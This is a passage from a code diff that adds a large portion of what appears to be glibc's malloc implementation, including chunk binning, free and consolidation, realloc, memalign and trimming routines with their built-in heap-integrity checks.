+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+	  if (__glibc_unlikely (fwd->bk != bck))
+                    {
+                      errstr = "malloc(): corrupted unsorted chunks 2";
+                      goto errout;
+                    }
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (have_fastchunks (av))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  const char *errstr = NULL;
+  int locked = 0;
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    {
+      errstr = "free(): invalid pointer";
+    errout:
+      if (!have_lock && locked)
+        __libc_lock_unlock (av->mutex);
+      malloc_printerr (check_action, errstr, chunk2mem (p), av);
+      return;
+    }
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    {
+      errstr = "free(): invalid size";
+      goto errout;
+    }
+
+  check_inuse_chunk(av, p);
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might have let to a false positive.  Redo the test
+	   after getting the lock.  */
+	if (have_lock
+	    || ({ assert (locked == 0);
+		  __libc_lock_lock (av->mutex);
+		  locked = 1;
+		  chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem;
+	      }))
+	  {
+	    errstr = "free(): invalid next size (fast)";
+	    goto errout;
+	  }
+	if (! have_lock)
+	  {
+	    __libc_lock_unlock (av->mutex);
+	    locked = 0;
+	  }
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    set_fastchunks(av);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+    unsigned int old_idx = ~0u;
+    do
+      {
+	/* Check that the top of the bin is not the record we are going to add
+	   (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  {
+	    errstr = "double free or corruption (fasttop)";
+	    goto errout;
+	  }
+	/* Check that size of fastbin chunk at the top is the same as
+	   size of the chunk that we are adding.  We can dereference OLD
+	   only if we have the lock, otherwise it might have already been
+	   deallocated.  See use of OLD_IDX below for the actual check.  */
+	if (have_lock && old != NULL)
+	  old_idx = fastbin_index(chunksize(old));
+	p->fd = old2 = old;
+      }
+    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
+
+    if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
+      {
+	errstr = "invalid fastbin entry (free)";
+	goto errout;
+      }
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+    if (! have_lock) {
+      __libc_lock_lock (av->mutex);
+      locked = 1;
+    }
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      {
+	errstr = "double free or corruption (top)";
+	goto errout;
+      }
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+      {
+	errstr = "double free or corruption (out)";
+	goto errout;
+      }
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      {
+	errstr = "double free or corruption (!prev)";
+	goto errout;
+      }
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      {
+	errstr = "free(): invalid next size (normal)";
+	goto errout;
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	{
+	  errstr = "free(): corrupted unsorted chunks";
+	  goto errout;
+	}
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (have_fastchunks(av))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (! have_lock) {
+      assert (locked);
+      __libc_lock_unlock (av->mutex);
+    }
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+
+  Also, because this routine needs to be called the first time through
+  malloc anyway, it turns out to be the perfect place to trigger
+  initialization code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  /*
+    If max_fast is 0, we know that av hasn't
+    yet been initialized, in which case do so below
+  */
+
+  if (get_max_fast () != 0) {
+    clear_fastchunks(av);
+
+    unsorted_bin = unsorted_chunks(av);
+
+    /*
+      Remove each chunk from fast bin and consolidate it, placing it
+      then in unsorted bin. Among other reasons for doing this,
+      placing in unsorted bin avoids needing to calculate actual bins
+      until malloc is sure that chunks aren't immediately going to be
+      reused anyway.
+    */
+
+    maxfb = &fastbin (av, NFASTBINS - 1);
+    fb = &fastbin (av, 0);
+    do {
+      p = atomic_exchange_acq (fb, NULL);
+      if (p != 0) {
+	do {
+	  check_inuse_chunk(av, p);
+	  nextp = p->fd;
+
+	  /* Slightly streamlined version of consolidation code in free() */
+	  size = chunksize (p);
+	  nextchunk = chunk_at_offset(p, size);
+	  nextsize = chunksize(nextchunk);
+
+	  if (!prev_inuse(p)) {
+	    prevsize = prev_size (p);
+	    size += prevsize;
+	    p = chunk_at_offset(p, -((long) prevsize));
+	    unlink(av, p, bck, fwd);
+	  }
+
+	  if (nextchunk != av->top) {
+	    nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	    if (!nextinuse) {
+	      size += nextsize;
+	      unlink(av, nextchunk, bck, fwd);
+	    } else
+	      clear_inuse_bit_at_offset(nextchunk, 0);
+
+	    first_unsorted = unsorted_bin->fd;
+	    unsorted_bin->fd = p;
+	    first_unsorted->bk = p;
+
+	    if (!in_smallbin_range (size)) {
+	      p->fd_nextsize = NULL;
+	      p->bk_nextsize = NULL;
+	    }
+
+	    set_head(p, size | PREV_INUSE);
+	    p->bk = unsorted_bin;
+	    p->fd = first_unsorted;
+	    set_foot(p, size);
+	  }
+
+	  else {
+	    size += nextsize;
+	    set_head(p, size | PREV_INUSE);
+	    av->top = p;
+	  }
+
+	} while ( (p = nextp) != 0);
+
+      }
+    } while (fb++ != maxfb);
+  }
+  else {
+    malloc_init_state(av);
+    check_malloc_state(av);
+  }
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  mchunkptr        bck;             /* misc temp for linking */
+  mchunkptr        fwd;             /* misc temp for linking */
+
+  unsigned long    copysize;        /* bytes to copy */
+  unsigned int     ncopies;         /* INTERNAL_SIZE_T words to copy */
+  INTERNAL_SIZE_T* s;               /* copy source */
+  INTERNAL_SIZE_T* d;               /* copy destination */
+
+  const char *errstr = NULL;
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid old size";
+    errout:
+      malloc_printerr (check_action, errstr, chunk2mem (oldp), av);
+      return NULL;
+    }
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    {
+      errstr = "realloc(): invalid next size";
+      goto errout;
+    }
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink (av, next, bck, fwd);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+              /*
+                 Unroll copy of <= 36 bytes (72 if 8byte sizes)
+                 We know that contents have an odd number of
+                 INTERNAL_SIZE_T-sized words; minimally 3.
+               */
+
+              copysize = oldsize - SIZE_SZ;
+              s = (INTERNAL_SIZE_T *) (chunk2mem (oldp));
+              d = (INTERNAL_SIZE_T *) (newmem);
+              ncopies = copysize / sizeof (INTERNAL_SIZE_T);
+              assert (ncopies >= 3);
+
+              if (ncopies > 9)
+                memcpy (d, s, copysize);
+
+              else
+                {
+                  *(d + 0) = *(s + 0);
+                  *(d + 1) = *(s + 1);
+                  *(d + 2) = *(s + 2);
+                  if (ncopies > 4)
+                    {
+                      *(d + 3) = *(s + 3);
+                      *(d + 4) = *(s + 4);
+                      if (ncopies > 6)
+                        {
+                          *(d + 5) = *(s + 5);
+                          *(d + 6) = *(s + 6);
+                          if (ncopies > 8)
+                            {
+                              *(d + 7) = *(s + 7);
+                              *(d + 8) = *(s + 8);
+                            }
+                        }
+                    }
+                }
+
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Don't touch corrupt arenas.  */
+  if (arena_is_corrupt (av))
+    return 0;
+
+  /* Ensure initialization/consolidation */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  /* Ensure initialization */
+  if (av->top == 0)
+    malloc_consolidate (av);
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
